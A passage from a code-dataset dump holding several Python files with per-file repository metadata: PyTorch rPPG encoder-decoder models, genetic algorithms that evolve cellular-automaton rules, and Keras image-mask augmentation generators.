        def temporal_upsampler(channels):
            # Transposed conv that doubles the temporal length only.
            return nn.Sequential(
                nn.ConvTranspose3d(in_channels=channels, out_channels=channels,
                                   kernel_size=[4, 1, 1], stride=[2, 1, 1],
                                   padding=[1, 0, 0]),
                nn.BatchNorm3d(channels),
                nn.ELU(),
            )

        self.Conv1 = encoder_stage(3, 16, [1, 5, 5], [0, 2, 2])
        self.Conv2 = encoder_stage(16, 32, [1, 5, 5], [0, 2, 2])
        self.Conv3 = encoder_stage(32, 64, [3, 3, 3], 1)
        self.Conv4 = encoder_stage(64, 64, [3, 3, 3], 1)
        self.TrConv1 = temporal_upsampler(64)
        self.TrConv2 = temporal_upsampler(64)
        self.ConvBlock5 = nn.Conv3d(64, 1, [1, 1, 1], stride=1, padding=0)
        self.MaxpoolTem_211_211 = nn.MaxPool3d((2, 1, 1), stride=(2, 1, 1))
        self.poolspa = nn.AdaptiveAvgPool3d((frames, 1, 1))

    def forward(self, x):
        """Map [b, 3, T, 8, 8] -> [b, frames] rPPG signal."""
        # Encoder: halve the temporal length after each of the first two convs.
        feat = self.MaxpoolTem_211_211(self.Conv1(x))
        feat = self.MaxpoolTem_211_211(self.Conv2(feat))
        feat = self.Conv4(self.Conv3(feat))
        # Decoder: two transposed convs restore the temporal resolution.
        feat = self.TrConv2(self.TrConv1(feat))
        # Collapse space, then squeeze channels down to a single signal.
        feat = self.ConvBlock5(self.poolspa(feat))
        return feat.view(-1, feat.shape[2])
#%% 3DED4 - Note that 3DED8, 3DED4, and 3DED2 are the same architecture.
class N3DED4(nn.Module):
    """3D encoder-decoder rPPG network for 4x4 input frames.

    Same architecture as N3DED8/N3DED2: only temporal pooling, spatial
    resolution is preserved until the final adaptive average pool.
    Maps [batch, 3, T, 4, 4] to [batch, frames].
    """

    def __init__(self, frames=128):
        super(N3DED4, self).__init__()

        def encoder_stage(c_in, c_out, kernel, pad):
            # Conv3d -> BatchNorm3d -> ReLU; spatial/temporal size preserved.
            return nn.Sequential(
                nn.Conv3d(c_in, c_out, kernel, stride=1, padding=pad),
                nn.BatchNorm3d(c_out),
                nn.ReLU(inplace=True),
            )

        def temporal_upsampler(channels):
            # Transposed conv that doubles the temporal length only.
            return nn.Sequential(
                nn.ConvTranspose3d(in_channels=channels, out_channels=channels,
                                   kernel_size=[4, 1, 1], stride=[2, 1, 1],
                                   padding=[1, 0, 0]),
                nn.BatchNorm3d(channels),
                nn.ELU(),
            )

        self.Conv1 = encoder_stage(3, 16, [1, 5, 5], [0, 2, 2])
        self.Conv2 = encoder_stage(16, 32, [1, 5, 5], [0, 2, 2])
        self.Conv3 = encoder_stage(32, 64, [3, 3, 3], 1)
        self.Conv4 = encoder_stage(64, 64, [3, 3, 3], 1)
        self.TrConv1 = temporal_upsampler(64)
        self.TrConv2 = temporal_upsampler(64)
        self.ConvBlock5 = nn.Conv3d(64, 1, [1, 1, 1], stride=1, padding=0)
        self.MaxpoolTem_211_211 = nn.MaxPool3d((2, 1, 1), stride=(2, 1, 1))
        self.poolspa = nn.AdaptiveAvgPool3d((frames, 1, 1))

    def forward(self, x):
        """Map [b, 3, T, 4, 4] -> [b, frames] rPPG signal."""
        # Encoder: halve the temporal length after each of the first two convs.
        feat = self.MaxpoolTem_211_211(self.Conv1(x))
        feat = self.MaxpoolTem_211_211(self.Conv2(feat))
        feat = self.Conv4(self.Conv3(feat))
        # Decoder: two transposed convs restore the temporal resolution.
        feat = self.TrConv2(self.TrConv1(feat))
        # Collapse space, then squeeze channels down to a single signal.
        feat = self.ConvBlock5(self.poolspa(feat))
        return feat.view(-1, feat.shape[2])
#%% 3DED2 - Note that 3DED8, 3DED4, and 3DED2 are the same architecture.
class N3DED2(nn.Module):
    """3D encoder-decoder rPPG network for 2x2 input frames.

    Same architecture as N3DED8/N3DED4: only temporal pooling, spatial
    resolution is preserved until the final adaptive average pool.
    Maps [batch, 3, T, 2, 2] to [batch, frames].
    """

    def __init__(self, frames=128):
        super(N3DED2, self).__init__()

        def encoder_stage(c_in, c_out, kernel, pad):
            # Conv3d -> BatchNorm3d -> ReLU; spatial/temporal size preserved.
            return nn.Sequential(
                nn.Conv3d(c_in, c_out, kernel, stride=1, padding=pad),
                nn.BatchNorm3d(c_out),
                nn.ReLU(inplace=True),
            )

        def temporal_upsampler(channels):
            # Transposed conv that doubles the temporal length only.
            return nn.Sequential(
                nn.ConvTranspose3d(in_channels=channels, out_channels=channels,
                                   kernel_size=[4, 1, 1], stride=[2, 1, 1],
                                   padding=[1, 0, 0]),
                nn.BatchNorm3d(channels),
                nn.ELU(),
            )

        self.Conv1 = encoder_stage(3, 16, [1, 5, 5], [0, 2, 2])
        self.Conv2 = encoder_stage(16, 32, [1, 5, 5], [0, 2, 2])
        self.Conv3 = encoder_stage(32, 64, [3, 3, 3], 1)
        self.Conv4 = encoder_stage(64, 64, [3, 3, 3], 1)
        self.TrConv1 = temporal_upsampler(64)
        self.TrConv2 = temporal_upsampler(64)
        self.ConvBlock5 = nn.Conv3d(64, 1, [1, 1, 1], stride=1, padding=0)
        self.MaxpoolTem_211_211 = nn.MaxPool3d((2, 1, 1), stride=(2, 1, 1))
        self.poolspa = nn.AdaptiveAvgPool3d((frames, 1, 1))

    def forward(self, x):
        """Map [b, 3, T, 2, 2] -> [b, frames] rPPG signal."""
        # Encoder: halve the temporal length after each of the first two convs.
        feat = self.MaxpoolTem_211_211(self.Conv1(x))
        feat = self.MaxpoolTem_211_211(self.Conv2(feat))
        feat = self.Conv4(self.Conv3(feat))
        # Decoder: two transposed convs restore the temporal resolution.
        feat = self.TrConv2(self.TrConv1(feat))
        # Collapse space, then squeeze channels down to a single signal.
        feat = self.ConvBlock5(self.poolspa(feat))
        return feat.view(-1, feat.shape[2])
#%% DEBUGGING
def clear_gpu():
    """Free unreferenced tensors and release PyTorch's cached CUDA memory.

    Runs Python's garbage collector first so tensors with no remaining
    references are actually collected, then asks PyTorch to return cached
    CUDA blocks to the driver. Guarded so it is a safe no-op on machines
    without a usable CUDA device.
    """
    import gc
    gc.collect()
    if torch.cuda.is_available():  # empty_cache is only meaningful with CUDA
        torch.cuda.empty_cache()
def stand_alone():
    """Smoke-test one of the N3DED* models on random input.

    This function should be used for debugging purposes only. Edit the
    flags below by hand:
      model_name (str): model to be used.
      device (str): device where the test will be performed: 'CPU', 'GPU',
          or 'auto'.
      batch_size (int): batch size.

    Returns the model output so a caller can inspect its shape.
    """
    # Set your flags manually
    model_name = 'N3DED8'  # 'N3DED128', 'N3DED64', 'N3DED32', 'N3DED16', 'N3DED8', 'N3DED4', 'N3DED2'
    device = 'auto'  # 'CPU', 'GPU', 'auto'
    batch_size = 8
    # Set device. BUG FIX: the original left `device` as the string 'CPU'
    # for the CPU option, which torch rejects (device strings are lowercase).
    if device == 'auto':
        device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
    elif device == 'GPU':
        device = torch.device("cuda:0")
    else:  # 'CPU'
        device = torch.device("cpu")
    if device.type == 'cuda':
        clear_gpu()
    # Set model. BUG FIX: the original if/elif chain left model/Width/Height
    # undefined (NameError) for an unrecognized model_name; fail explicitly.
    model_zoo = {
        'N3DED128': (N3DED128, 128),
        'N3DED64': (N3DED64, 64),
        'N3DED32': (N3DED32, 32),
        'N3DED16': (N3DED16, 16),
        'N3DED8': (N3DED8, 8),
        'N3DED4': (N3DED4, 4),
        'N3DED2': (N3DED2, 2),
    }
    try:
        model_cls, side = model_zoo[model_name]
    except KeyError:
        raise ValueError(f"Unknown model_name: {model_name!r}") from None
    model = model_cls()
    Channels = 3
    T = 128
    Width = Height = side  # each model expects a square input of its own size
    x = torch.randn((batch_size, Channels, T, Width, Height), device=device, dtype=torch.float32)
    print(f'[Debug] Testing {model_name} in {device}. input=[b={batch_size},F={Channels},T={T},W={Width},H={Height}]')
    # Run the model
    model.to(device)
    y = model(x)
    return y
# Script entry point: run the stand-alone model smoke test only when this
# file is executed directly (importing it as a module has no side effects).
if __name__ == "__main__":
    stand_alone()
| 39.479779
| 134
| 0.475718
| 3,490
| 21,477
| 2.87765
| 0.041261
| 0.02788
| 0.02091
| 0.03485
| 0.879219
| 0.874838
| 0.874838
| 0.874838
| 0.844369
| 0.831524
| 0
| 0.160326
| 0.326815
| 21,477
| 544
| 135
| 39.479779
| 0.534306
| 0.241607
| 0
| 0.730479
| 0
| 0.002519
| 0.011837
| 0.003842
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040302
| false
| 0
| 0.007557
| 0
| 0.083123
| 0.002519
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fb4adf5b19b36fccfb35f9af0b28fc37ac4880c1
| 188
|
py
|
Python
|
utils/__init__.py
|
yamamura-k/MetaHeuristics
|
abc6da4c0d9886260425124dfcee2a92b833446f
|
[
"MIT"
] | 1
|
2021-09-14T04:28:18.000Z
|
2021-09-14T04:28:18.000Z
|
utils/__init__.py
|
yamamura-k/MetaHeuristics
|
abc6da4c0d9886260425124dfcee2a92b833446f
|
[
"MIT"
] | 6
|
2021-07-01T01:13:43.000Z
|
2021-07-15T14:26:46.000Z
|
utils/__init__.py
|
yamamura-k/MetaHeuristics
|
abc6da4c0d9886260425124dfcee2a92b833446f
|
[
"MIT"
] | null | null | null |
from utils.base import *
from utils.common import *
from utils.grad_based import *
from utils.logging import setup_logger
from utils.parallel import *
from utils.parameter_search import *
| 26.857143
| 38
| 0.81383
| 28
| 188
| 5.357143
| 0.464286
| 0.36
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12766
| 188
| 6
| 39
| 31.333333
| 0.914634
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
fb9466e7900c3b2017fb7a7137bf6e36d38a4dfb
| 10,128
|
py
|
Python
|
evodynamic/evolution/ga.py
|
SocratesNFR/evodynamic
|
682b610096182bde2298cdca352e7b319a0e4c41
|
[
"Apache-2.0"
] | 9
|
2019-06-07T22:57:07.000Z
|
2022-01-17T12:35:08.000Z
|
evodynamic/evolution/ga.py
|
SocratesNFR/evodynamic
|
682b610096182bde2298cdca352e7b319a0e4c41
|
[
"Apache-2.0"
] | null | null | null |
evodynamic/evolution/ga.py
|
SocratesNFR/evodynamic
|
682b610096182bde2298cdca352e7b319a0e4c41
|
[
"Apache-2.0"
] | 4
|
2020-09-02T16:17:58.000Z
|
2021-12-05T21:28:32.000Z
|
"""
Genetic algorithm
- Generate random genomes
- Evaluate genomes
- Select genomes and reproduce them
* Code based on https://github.com/PytLab/gaft/blob/master/gaft
"""
import numpy as np
import random
import time
import csv
def evolve_rules(evaluate_genome, pop_size=10, generation=4, gene_range=(0, 255)):
    """
    Genetic algorithm for evolving rules of a 1D cellular automaton.

    The genome is a list of int that is initialized with 1 to 5 elements
    (genes). Each gene represents a rule that is executed in sequence for one
    time step. Genes can be added or removed depending on their probabilities.
    This function returns the best genome. It also saves the log of the
    evolution in a csv file.

    Parameters
    ----------
    evaluate_genome : function
        Function that returns a (fitness_score, val_dict) tuple for a genome.
    pop_size : int
        Size of the population (must be even).
    generation : int
        Maximum number of generations.
    gene_range : sequence with 2 elements
        Inclusive [low, high] range of the gene values. (Changed from a
        mutable list default to a tuple; callers may still pass a list.)

    Returns
    -------
    best_genome : list
        Best genome of entire evolution process.
    """
    assert pop_size % 2 == 0, "Error: pop_size must be even!"
    timestr = time.strftime("%Y%m%d-%H%M%S")
    prob_crossover = 0.8
    prob_exchange = 0.5
    prob_mutate_gene = 0.1
    prob_add_gene = 0.1
    prob_delete_gene = 0.1
    # Number of admissible gene values; used to wrap mutations back into range.
    gene_span = gene_range[1] - gene_range[0] + 1
    pop_indices = list(range(pop_size))
    pop_list = [[np.random.randint(gene_range[0], gene_range[1] + 1)
                 for gene in range(np.random.randint(1, 5))]
                for pop in range(pop_size)]
    fitness_list = []
    val_dict_list = []
    # "with" guarantees the log file is closed even if evaluate_genome raises.
    with open("evo_rules_" + timestr + ".txt", "w", newline="") as filehistory:
        wr = csv.writer(filehistory, delimiter=";")
        wr.writerow(["generation", "fitness", "val_dict", "genome"])
        for genome in pop_list:
            fitness_score, val_dict = evaluate_genome(genome)
            fitness_list.append(fitness_score)
            val_dict_list.append(val_dict)
            wr.writerow(["0", str(fitness_score), str(val_dict), str(genome)])
        best_genome_idx = max(pop_indices, key=lambda idx: fitness_list[idx])
        best_genome = pop_list[best_genome_idx].copy()
        best_genome_fitness = fitness_list[best_genome_idx]
        best_val_dict = val_dict_list[best_genome_idx].copy()
        for gen in range(generation):
            new_pop_list = []
            new_fitness_list = []
            new_val_dict_list = []
            for _ in range(pop_size // 2):
                # Tournament selection
                group1 = random.sample(pop_indices, 2)
                group2 = random.sample(pop_indices, 2)
                selected1 = max(group1, key=lambda idx: fitness_list[idx])
                selected2 = max(group2, key=lambda idx: fitness_list[idx])
                # BUG FIX: copy the selected genomes. The original mutated
                # pop_list entries in place, so a genome selected in several
                # tournaments was mutated several times and aliased copies
                # ended up in new_pop_list.
                genome1 = pop_list[selected1].copy()
                genome2 = pop_list[selected2].copy()
                for i, (gene1, gene2) in enumerate(zip(genome1, genome2)):
                    # Crossover
                    if prob_crossover > np.random.random():
                        # Exchange of genes
                        if prob_exchange > np.random.random():
                            genome1[i] = gene2
                            genome2[i] = gene1
                    # Mutate gene 1. BUG FIX: wrap within gene_range instead
                    # of the hard-coded "% 255", which both ignored gene_range
                    # and could never produce the upper bound 255.
                    if prob_mutate_gene > np.random.random():
                        genome1[i] = gene_range[0] + (
                            genome1[i] + np.random.randint(-25, 26) - gene_range[0]) % gene_span
                    # Mutate gene 2
                    if prob_mutate_gene > np.random.random():
                        genome2[i] = gene_range[0] + (
                            genome2[i] + np.random.randint(-25, 26) - gene_range[0]) % gene_span
                # Add gene to genome 1
                if prob_add_gene > np.random.random():
                    genome1.append(np.random.randint(gene_range[0], gene_range[1] + 1))
                # Add gene to genome 2
                if prob_add_gene > np.random.random():
                    genome2.append(np.random.randint(gene_range[0], gene_range[1] + 1))
                # Delete gene from genome 1 (never leave an empty genome)
                if prob_delete_gene > np.random.random() and len(genome1) > 1:
                    del genome1[np.random.randint(len(genome1))]
                # Delete gene from genome 2
                if prob_delete_gene > np.random.random() and len(genome2) > 1:
                    del genome2[np.random.randint(len(genome2))]
                # Add new genomes for next generation
                new_pop_list.append(genome1)
                new_pop_list.append(genome2)
                # Evaluate new genomes
                fitness_genome1, val_dict1 = evaluate_genome(genome1)
                fitness_genome2, val_dict2 = evaluate_genome(genome2)
                new_fitness_list.append(fitness_genome1)
                new_fitness_list.append(fitness_genome2)
                new_val_dict_list.append(val_dict1)
                new_val_dict_list.append(val_dict2)
                wr.writerow([str(gen + 1), str(fitness_genome1), str(val_dict1), str(genome1)])
                wr.writerow([str(gen + 1), str(fitness_genome2), str(val_dict2), str(genome2)])
            pop_list = new_pop_list
            fitness_list = new_fitness_list
            val_dict_list = new_val_dict_list
            generation_best_genome_idx = max(pop_indices, key=lambda idx: fitness_list[idx])
            # Elitist bookkeeping: remember the best genome seen in any generation.
            if fitness_list[generation_best_genome_idx] > best_genome_fitness:
                best_genome = pop_list[generation_best_genome_idx].copy()
                best_genome_fitness = fitness_list[generation_best_genome_idx]
                best_val_dict = val_dict_list[generation_best_genome_idx].copy()
                print("PARTIAL generation_best_genome_idx", generation_best_genome_idx)
                print("PARTIAL best_genome", best_genome)
                print("PARTIAL new_pop_list[generation_best_genome_idx]", new_pop_list[generation_best_genome_idx])
                print("PARTIAL best_genome_fitness", best_genome_fitness)
                print("PARTIAL new_fitness_list[idx]", new_fitness_list[generation_best_genome_idx])
                print("PARTIAL new_pop_list[generation_best_genome_idx]", new_pop_list[generation_best_genome_idx])
                print("PARTIAL best_val_dict", best_val_dict)
    print("best_genome", best_genome)
    print("best_genome_fitness", best_genome_fitness)
    print("best_val_dict", best_val_dict)
    return best_genome
def evolve_probability(evaluate_genome, pop_size=10, generation=10, prob_size=8):
    """
    Genetic algorithm for evolving rules of a 1D stochastic cellular automaton.

    The genome is a list of float with `prob_size` genes. Each gene represents
    the probability of the state becoming one for each neighborhood pattern.
    This function returns the best genome. It also saves the log of the
    evolution in a csv file.

    Parameters
    ----------
    evaluate_genome : function
        Function that returns a (fitness_score, val_dict) tuple for a genome.
    pop_size : int
        Size of the population (must be even).
    generation : int
        Maximum number of generations.
    prob_size : int
        Size of the genome containing the probabilities.

    Returns
    -------
    best_genome : list
        Best genome of entire evolution process.
    """
    assert pop_size % 2 == 0, "Error: pop_size must be even!"
    timestr = time.strftime("%Y%m%d-%H%M%S")
    prob_crossover = 0.8
    prob_exchange = 0.5
    prob_mutate_gene = 0.1
    pop_indices = list(range(pop_size))
    pop_list = [[np.random.rand() for gene in range(prob_size)]
                for pop in range(pop_size)]
    fitness_list = []
    val_dict_list = []
    # "with" guarantees the log file is closed even if evaluate_genome raises.
    with open("evo_prob_" + timestr + ".txt", "w", newline="") as filehistory:
        wr = csv.writer(filehistory, delimiter=";")
        wr.writerow(["generation", "fitness", "val_dict", "genome"])
        for genome in pop_list:
            fitness_score, val_dict = evaluate_genome(genome)
            fitness_list.append(fitness_score)
            val_dict_list.append(val_dict)
            wr.writerow(["0", str(fitness_score), str(val_dict), str(genome)])
        best_genome_idx = max(pop_indices, key=lambda idx: fitness_list[idx])
        best_genome = pop_list[best_genome_idx].copy()
        best_genome_fitness = fitness_list[best_genome_idx]
        best_val_dict = val_dict_list[best_genome_idx].copy()
        for gen in range(generation):
            new_pop_list = []
            new_fitness_list = []
            new_val_dict_list = []
            for _ in range(pop_size // 2):
                # Tournament selection
                group1 = random.sample(pop_indices, 2)
                group2 = random.sample(pop_indices, 2)
                selected1 = max(group1, key=lambda idx: fitness_list[idx])
                selected2 = max(group2, key=lambda idx: fitness_list[idx])
                # BUG FIX: copy the selected genomes. The original mutated
                # pop_list entries in place, so a genome selected in several
                # tournaments was mutated several times and aliased copies
                # ended up in new_pop_list.
                genome1 = pop_list[selected1].copy()
                genome2 = pop_list[selected2].copy()
                for i, (gene1, gene2) in enumerate(zip(genome1, genome2)):
                    # Crossover
                    if prob_crossover > np.random.random():
                        # Exchange of genes
                        if prob_exchange > np.random.random():
                            genome1[i] = gene2
                            genome2[i] = gene1
                    # Mutate gene 1: Gaussian jitter clipped back to [0, 1].
                    if prob_mutate_gene > np.random.random():
                        genome1[i] = np.clip(genome1[i] + np.random.normal(scale=0.2), 0., 1.)
                    # Mutate gene 2
                    if prob_mutate_gene > np.random.random():
                        genome2[i] = np.clip(genome2[i] + np.random.normal(scale=0.2), 0., 1.)
                # Add new genomes for next generation
                new_pop_list.append(genome1)
                new_pop_list.append(genome2)
                # Evaluate new genomes
                fitness_genome1, val_dict1 = evaluate_genome(genome1)
                fitness_genome2, val_dict2 = evaluate_genome(genome2)
                new_fitness_list.append(fitness_genome1)
                new_fitness_list.append(fitness_genome2)
                new_val_dict_list.append(val_dict1)
                new_val_dict_list.append(val_dict2)
                wr.writerow([str(gen + 1), str(fitness_genome1), str(val_dict1), str(genome1)])
                wr.writerow([str(gen + 1), str(fitness_genome2), str(val_dict2), str(genome2)])
            pop_list = new_pop_list
            fitness_list = new_fitness_list
            val_dict_list = new_val_dict_list
            generation_best_genome_idx = max(pop_indices, key=lambda idx: fitness_list[idx])
            # Elitist bookkeeping: remember the best genome seen in any generation.
            if fitness_list[generation_best_genome_idx] > best_genome_fitness:
                best_genome = pop_list[generation_best_genome_idx].copy()
                best_genome_fitness = fitness_list[generation_best_genome_idx]
                best_val_dict = val_dict_list[generation_best_genome_idx].copy()
                print("PARTIAL generation_best_genome_idx", generation_best_genome_idx)
                print("PARTIAL best_genome", best_genome)
                print("PARTIAL new_pop_list[generation_best_genome_idx]", new_pop_list[generation_best_genome_idx])
                print("PARTIAL best_genome_fitness", best_genome_fitness)
                print("PARTIAL new_fitness_list[idx]", new_fitness_list[generation_best_genome_idx])
                print("PARTIAL best_val_dict", best_val_dict)
    print("best_genome", best_genome)
    print("best_genome_fitness", best_genome_fitness)
    print("best_val_dict", best_val_dict)
    return best_genome
| 36.171429
| 135
| 0.706359
| 1,464
| 10,128
| 4.611339
| 0.120902
| 0.094801
| 0.057769
| 0.074952
| 0.868908
| 0.864465
| 0.854688
| 0.839876
| 0.818545
| 0.80077
| 0
| 0.022044
| 0.189277
| 10,128
| 279
| 136
| 36.301075
| 0.800146
| 0.191252
| 0
| 0.859873
| 1
| 0
| 0.08292
| 0.026525
| 0
| 0
| 0
| 0
| 0.012739
| 1
| 0.012739
| false
| 0
| 0.025478
| 0
| 0.050955
| 0.121019
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
83a15aa2abcb648a9b2272d01fcd878b245082ff
| 24,424
|
py
|
Python
|
cosmiq_sn4_baseline/DataGenerator.py
|
lee-joey-hyunjoon/CosmiQ_SN4_Baseline
|
7b29c98335eaa3574a0bfbc58d297de2e0e5d95a
|
[
"Apache-2.0"
] | 21
|
2018-10-29T15:13:36.000Z
|
2022-01-07T04:23:06.000Z
|
cosmiq_sn4_baseline/DataGenerator.py
|
lee-joey-hyunjoon/CosmiQ_SN4_Baseline
|
7b29c98335eaa3574a0bfbc58d297de2e0e5d95a
|
[
"Apache-2.0"
] | 5
|
2018-11-01T01:55:42.000Z
|
2020-06-11T07:28:43.000Z
|
cosmiq_sn4_baseline/DataGenerator.py
|
lee-joey-hyunjoon/CosmiQ_SN4_Baseline
|
7b29c98335eaa3574a0bfbc58d297de2e0e5d95a
|
[
"Apache-2.0"
] | 8
|
2018-11-02T09:18:18.000Z
|
2021-03-01T11:57:16.000Z
|
import keras
import cv2
import numpy as np
import os
class DataGenerator(keras.utils.Sequence):
    """Data generator to produce matching image-mask pairs from the generator array.

    Assumes `image_arr` is shaped (collects, images, y, x, channels) and
    `mask_arr` is shaped (images, y, x, mask_channels), based on the indexing
    in `_data_generation` -- confirm against the caller. One collect is
    sampled per image each epoch; optional zoom/crop/flip/rotate/brightness
    augmentations are re-randomized in `on_epoch_end`.
    """

    def __init__(self, image_arr, mask_arr, batch_size=32, crop=False,
                 output_x=256, output_y=256, shuffle=True, flip_x=False,
                 zoom_range=None, flip_y=False, rotate=False,
                 rescale_brightness=None, output_dir=''):
        self.images = image_arr
        self.masks = mask_arr
        self.batch_size = batch_size
        self.initial_width = image_arr.shape[2]
        self.initial_height = image_arr.shape[1]
        self.output_x = output_x
        self.output_y = output_y
        self.crop = crop
        self.shuffle = shuffle
        self.flip_x = flip_x
        self.flip_y = flip_y
        self.rotate = rotate
        self.zoom_range = zoom_range
        self.output_dir = output_dir
        self.output_ctr = 0  # counter used to name optionally-saved batches
        self.rescale_brightness = rescale_brightness
        self.on_epoch_end()  # initialize per-epoch randomness up front

    def on_epoch_end(self):
        'Update indices, rotations, etc. after each epoch'
        # select one collect per image
        self.collect_indexes = np.random.choice(
            np.arange(self.images.shape[0]),
            size=self.images.shape[1])
        if self.shuffle:
            np.random.shuffle(self.collect_indexes)
        # reorder images
        self.image_indexes = np.arange(self.images.shape[1])
        if self.shuffle:
            np.random.shuffle(self.image_indexes)
        if self.crop:
            # Random crop origins, one per slot in the batch.
            self.x_mins = np.random.randint(
                0, self.images.shape[3] - self.output_x, size=self.batch_size
            )
            self.y_mins = np.random.randint(
                0, self.images.shape[2] - self.output_y, size=self.batch_size
            )
        if self.flip_x:
            self.x_flips = np.random.choice(
                [False, True], size=self.batch_size
            )
        if self.flip_y:
            self.y_flips = np.random.choice(
                [False, True], size=self.batch_size
            )
        if self.rotate:
            self.n_rotations = np.random.choice(
                [0, 1, 2, 3], size=self.batch_size
            )
        if self.rescale_brightness is not None:
            self.amt_to_scale = np.random.uniform(
                low=self.rescale_brightness[0],
                high=self.rescale_brightness[1],
                size=self.batch_size
            )
        if self.zoom_range is not None:
            # Clamp zoom so a zoomed-out image still covers the output size.
            if (1 - self.zoom_range) * self.images.shape[2] < self.output_y:
                self.zoom_range = self.output_y / self.images.shape[2]
            if (1 - self.zoom_range) * self.images.shape[3] < self.output_x:
                self.zoom_range = self.output_x / self.images.shape[3]
            self.zoom_amt_y = np.random.uniform(
                low=1 - self.zoom_range,
                high=1 + self.zoom_range,
                size=self.batch_size
            )
            self.zoom_amt_x = np.random.uniform(
                low=1 - self.zoom_range,
                high=1 + self.zoom_range,
                size=self.batch_size
            )

    def _data_generation(self, collect_idxs, image_idxs):
        """Build one (X, y) batch, applying the configured augmentations."""
        # initialize
        X = np.empty((self.batch_size, self.output_y, self.output_x,
                      self.images.shape[4]))
        y = np.empty((self.batch_size, self.output_y, self.output_x,
                      self.masks.shape[3]))
        for i in range(self.batch_size):
            curr_im = self.images[collect_idxs[i],
                                  image_idxs[i],
                                  :, :, :]
            curr_mask = self.masks[image_idxs[i], :, :, :]
            if self.zoom_range is not None:
                # cv2.resize takes dsize as a (width, height) 2-tuple.
                curr_im = cv2.resize(
                    curr_im,
                    (int(curr_im.shape[1] * self.zoom_amt_x[i]),
                     int(curr_im.shape[0] * self.zoom_amt_y[i])))
                curr_mask = cv2.resize(
                    curr_mask.astype('uint8'),
                    (int(curr_mask.shape[1] * self.zoom_amt_x[i]),
                     int(curr_mask.shape[0] * self.zoom_amt_y[i])))
                if len(curr_mask.shape) < 3:  # add third axis if absent
                    curr_mask = curr_mask[:, :, np.newaxis]
                curr_mask = curr_mask > 0
                pad_amt = [0, 0]
                # NOTE(review): pad amount scales with zoom_amt rather than
                # the shortfall (1 - zoom_amt); it over-pads but keeps the
                # image at least output-sized -- confirm against crop bounds.
                if self.zoom_amt_y[i] < 1:
                    pad_amt[0] = int(self.images.shape[2] * self.zoom_amt_y[i] * 0.5)
                if self.zoom_amt_x[i] < 1:
                    pad_amt[1] = int(self.images.shape[3] * self.zoom_amt_x[i] * 0.5)
                if pad_amt != [0, 0]:
                    curr_mask = np.pad(
                        curr_mask,
                        pad_width=((pad_amt[0], pad_amt[0]),
                                   (pad_amt[1], pad_amt[1]),
                                   (0, 0)),
                        mode='reflect')
                    curr_im = np.pad(
                        curr_im,
                        pad_width=((pad_amt[0], pad_amt[0]),
                                   (pad_amt[1], pad_amt[1]),
                                   (0, 0)),
                        mode='reflect')
            if self.crop:
                curr_im = curr_im[self.y_mins[i]:self.y_mins[i] + self.output_y,
                                  self.x_mins[i]:self.x_mins[i] + self.output_x,
                                  :]
                curr_mask = curr_mask[
                    self.y_mins[i]:self.y_mins[i] + self.output_y,
                    self.x_mins[i]:self.x_mins[i] + self.output_x,
                    :]
            else:
                # BUG FIX: the original passed an invalid 3-element dsize to
                # cv2.resize (dsize must be a (width, height) 2-tuple) and
                # resized `curr_im` into `curr_mask`, discarding the real
                # mask entirely. Resize each array to the output size and
                # re-binarize the mask, mirroring the zoom branch.
                curr_im = cv2.resize(curr_im, (self.output_x, self.output_y))
                curr_mask = cv2.resize(curr_mask.astype('uint8'),
                                       (self.output_x, self.output_y))
                if len(curr_mask.shape) < 3:
                    curr_mask = curr_mask[:, :, np.newaxis]
                curr_mask = curr_mask > 0
            if self.flip_x:
                if self.x_flips[i]:
                    curr_im = np.flip(curr_im, axis=0)
                    curr_mask = np.flip(curr_mask, axis=0)
            if self.flip_y:
                if self.y_flips[i]:
                    curr_im = np.flip(curr_im, axis=1)
                    curr_mask = np.flip(curr_mask, axis=1)
            if self.rotate:
                to_go = 0
                while to_go < self.n_rotations[i]:
                    curr_im = np.rot90(curr_im)
                    curr_mask = np.rot90(curr_mask)
                    to_go += 1
            if self.rescale_brightness is not None:
                # Scale the V channel in HSV space, then convert back.
                hsv = cv2.cvtColor(curr_im, cv2.COLOR_BGR2HSV)
                v = hsv[:, :, 2] * self.amt_to_scale[i]
                v = np.clip(v, 0, 255).astype('uint8')
                hsv[:, :, 2] = v
                curr_im = cv2.cvtColor(hsv, cv2.COLOR_HSV2BGR)
            X[i, :, :, :] = curr_im
            y[i, :, :, :] = curr_mask
        X = X / 255.  # scale pixel values to [0, 1]
        return X, y

    def __len__(self):
        'Denotes the number of batches per epoch'
        return int(np.floor(self.images.shape[1] / self.batch_size))

    def __getitem__(self, index):
        'Generate one batch of data'
        # Generate indexes of the batch
        col_inds = self.collect_indexes[index * self.batch_size:(index + 1) * self.batch_size]
        im_inds = self.image_indexes[index * self.batch_size:(index + 1) * self.batch_size]
        # Generate data
        X, y = self._data_generation(collect_idxs=col_inds, image_idxs=im_inds)
        if self.output_dir:
            # Optionally dump each generated batch for inspection/debugging.
            np.save(os.path.join(
                self.output_dir, 'images_{}.npy'.format(self.output_ctr)),
                X)
            np.save(os.path.join(
                self.output_dir, 'masks_{}.npy'.format(self.output_ctr)),
                y)
            self.output_ctr += 1
        return X, y
class FlatDataGenerator(keras.utils.Sequence):
    """Data generator producing matching image-mask batch pairs.

    Draws samples from 4D arrays shaped (n_samples, height, width, channels)
